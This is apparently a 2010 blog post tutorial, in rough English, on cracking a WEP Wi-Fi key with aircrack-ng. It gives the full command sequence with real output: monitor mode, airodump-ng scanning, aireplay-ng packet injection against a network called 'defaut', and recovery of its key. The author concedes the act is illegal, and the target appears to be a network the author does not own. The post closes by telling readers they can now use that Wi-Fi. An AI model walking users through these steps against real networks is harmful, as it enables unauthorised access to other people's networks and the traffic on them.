by bouleetbil
19. février 2010 10:43
For beginning, you can crack a wep key with aircrack-ng but it's ILLEGAL 
Install aircrack-ng :
# pacman-g2 -S aircrack-ng
Monitoring wlan0
# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2458 avahi-daemon
2459 avahi-daemon
Interface Chipset Driver
wlan0 Ralink 2561 PCI rt61pci - [phy0]
(monitor mode enabled on mon0)
Now you can scan the network :
# airodump-ng mon0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH
2A:F3:5F:EC:32:88 -76 0 14019 17800 3 1 54 WEP WEP
BSSID STATION PWR Rate Lost Packets Probes
2A:F3:5F:EC:32:88 00:19:7E:82:8A:EF 0 1 - 1 20412 100866 defaut
2A:F3:5F:EC:32:88 00:C0:A8:C6:ED:60 -1 1 - 0 0 396
2A:F3:5F:EC:32:88 00:C0:A8:C6:ED:60 -1 1 - 0 0 396
2A:F3:5F:EC:32:88 00:C0:A8:D5:B5:18 -77 1 - 1 0 214
2A:F3:5F:EC:32:88 00:24:D2:3A:C6:D7 -77 1 - 1 0 688
2A:F3:5F:EC:32:88 00:22:43:2D:DE:68 -79 1 - 1 0 2788 defaut
Hey Hey 2 computeurs are connected to "defaut". "defaut" use the canal 1 and wep encryption.
Capture the frame of canal 1:
# airodump-ng --encrypt WEP -c 1 -w dump -i mon0
You can inject some frames for crack it quickly, open a new terminal and start the injection :
# aireplay-ng -3 -e defaut -a 2A:F3:5F:EC:32:88 -h 00:19:7E:82:8A:EF mon0
That will create a file dump-01.ivs. Wait that this file do 500ko
Crack the key:
# aircrack-ng -b 2A:F3:5F:EC:32:88 dump-01.ivs
KEY FOUND! [ 31:76:BF:E5:B1 ]
Decrypted correctly: 100%
\o/ you can use the wifi "defaut"
For the wpa http://code.google.com/p/pyrit/ I will test it and perhaps package it
Souscrire